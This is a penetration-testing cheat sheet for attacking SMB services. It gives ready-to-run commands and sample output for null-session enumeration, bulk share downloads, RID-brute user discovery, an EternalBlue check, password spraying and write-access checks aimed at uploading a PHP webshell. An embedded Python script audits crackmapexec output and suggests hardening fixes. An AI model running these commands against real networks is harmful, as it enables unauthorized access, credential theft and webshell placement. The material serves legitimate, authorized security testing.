SMB (139/445)
Null session enum
Comprehensive SMB enum — Users, shares, policies, groups
enum4linux -a $IP
Example Output
enum4linux -a 10.10.10.5
[+] Users:
administrator, guest, krbtgt, john.smith
[+] Shares:
IPC$, ADMIN$, C$, Backups, Users
List shares (null)
Anonymous share listing — Find accessible shares
smbclient -L //$IP -N
Example Output
smbclient -L //10.10.10.5 -N
Sharename       Type      Comment
---------       ----      -------
Backups         Disk      Company backups
Users           Disk      User directories
ADMIN$          Disk      Remote Admin
List shares (crackmapexec)
Alternative enum — Shows read/write permissions
crackmapexec smb $IP --shares -u '' -p ''
Example Output
crackmapexec smb 10.10.10.5 --shares -u '' -p ''
Share           Permissions     Remark
Backups         READ            Company backups
Users           READ,WRITE      User files
ADMIN$          NO ACCESS
(READ,WRITE on Users = upload potential)
Connect to shares
Browse each share — Download interesting files
smbclient //$IP/<share> -N
Example Output
smbclient //10.10.10.5/Backups -N
smb: \> ls
  .                                   D        0  Jan 01 2024
  old_config.bak                      A     1024  Jan 01 2024
  passwords.xlsx                      A     2048  Jan 01 2024
smb: \> get passwords.xlsx
Recursive download share
Grab everything — Offline analysis
smbget -R smb://$IP/<share>/
Example Output
smbget -R smb://10.10.10.5/Backups/
Downloaded 15 files
./Backups/IT/credentials.txt
./Backups/HR/employee_list.csv
(Analyze everything offline)
Enumerate users (RID cycling)
Find domain users — Build user list
crackmapexec smb $IP --rid-brute
Example Output
crackmapexec smb 10.10.10.5 --rid-brute
500: CORP\Administrator
501: CORP\Guest
1001: CORP\john.smith
1002: CORP\svc_sql
1003: CORP\admin.backup
Check for EternalBlue
MS17-010 — Instant SYSTEM shell if vulnerable
nmap --script smb-vuln-ms17-010 -p 445 $IP
Example Output
| smb-vuln-ms17-010:
|   VULNERABLE:
|     Risk factor: HIGH
(Use exploit/windows/smb/ms17_010_eternalblue)
Check SMB version/signing
Version and signing status — SMBv1 = more exploits, no signing = relay
crackmapexec smb $IP
Example Output
crackmapexec smb 10.10.10.5
SMB 10.10.10.5 445 TARGET [*] Windows 10.0 Build 17763 x64
SMB 10.10.10.5 445 TARGET [*] SMBv1: False
SMB 10.10.10.5 445 TARGET [*] Signing: False
(No signing = relay attacks possible)
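The share listing (--shares) and the version/signing banner above can be triaged automatically. The following is an added example, not part of this cheat sheet or of crackmapexec itself, that parses the simplified crackmapexec layout shown on this page (constructed sample input; real output prefixes the share table with the same SMB/host/port columns) and maps each weak setting to the hardening change that removes it.

```python
import re

# Constructed sample (not real capture): the two crackmapexec listings from this page,
# gathered with null credentials (-u '' -p ''), so READ/WRITE here means anonymous access.
SAMPLE = """\
SMB 10.10.10.5 445 TARGET [*] Windows 10.0 Build 17763 x64
SMB 10.10.10.5 445 TARGET [*] SMBv1: False
SMB 10.10.10.5 445 TARGET [*] Signing: False
Share Permissions Remark
Backups READ Company backups
Users READ,WRITE User files
ADMIN$ NO ACCESS
"""

# Banner lines: "SMB <host> <port> <name> [*] <info>"  (regexes are this example's own)
HOST_RE = re.compile(r"^SMB\s+(\S+)\s+\d+\s+\S+\s+\[\*\]\s+(.*?)\s*$")
# Share rows in the simplified layout used on this page: "<share> <perms> [remark]"
SHARE_RE = re.compile(r"^(\S+)\s+(READ,WRITE|READ|WRITE|NO ACCESS)(?:\s+(.*))?$")
ADMIN_SHARES = {"IPC$", "ADMIN$", "C$"}  # hidden defaults, expected to be admin-only


def audit(text: str, anonymous: bool = True) -> list[str]:
    """Map each weak setting in crackmapexec output to the fix a defender should apply."""
    who = "anonymous" if anonymous else "low-privileged user"
    findings = []
    for line in text.splitlines():
        banner = HOST_RE.match(line)
        if banner:
            host, info = banner.groups()
            if info == "SMBv1: True":
                findings.append(f"{host}: SMBv1 enabled -> disable SMBv1 (removes MS17-010 exposure)")
            elif info == "Signing: False":
                findings.append(f"{host}: signing not required -> enforce SMB signing (blocks NTLM relay)")
            continue
        row = SHARE_RE.match(line)
        if not row or row.group(1) in ADMIN_SHARES:
            continue  # header line, non-share text, or a default admin share
        share, perms, _remark = row.groups()
        if "WRITE" in perms:
            findings.append(f"share {share}: {who} WRITE -> remove the write ACE and review uploaded content")
        elif perms == "READ":
            findings.append(f"share {share}: {who} READ -> restrict to the groups that need it")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```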
Brute force with found users
Spray found creds — Password reuse across services
crackmapexec smb $IP -u users.txt -p passwords.txt
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p passwords.txt --continue-on-success
SMB [-] corp\admin:Password1
SMB [-] corp\admin:Welcome1
SMB [+] corp\john.smith:Winter2025
(--continue-on-success finds ALL valid combos)
Check for write access
Can you upload files? — Upload to web root or share
smbclient //$IP/<share>
smb: \> put test.txt
Example Output (using smbmap, which lists the permissions on every share at once)
smbmap -H 10.10.10.5 -u john -p Password1
        Disk            Permissions     Comment
        ----            -----------     -------
        Backups         READ ONLY
        Users           READ, WRITE     <- can upload!
        wwwroot         READ, WRITE     <- webshell target!
(WRITE on wwwroot = upload PHP shell)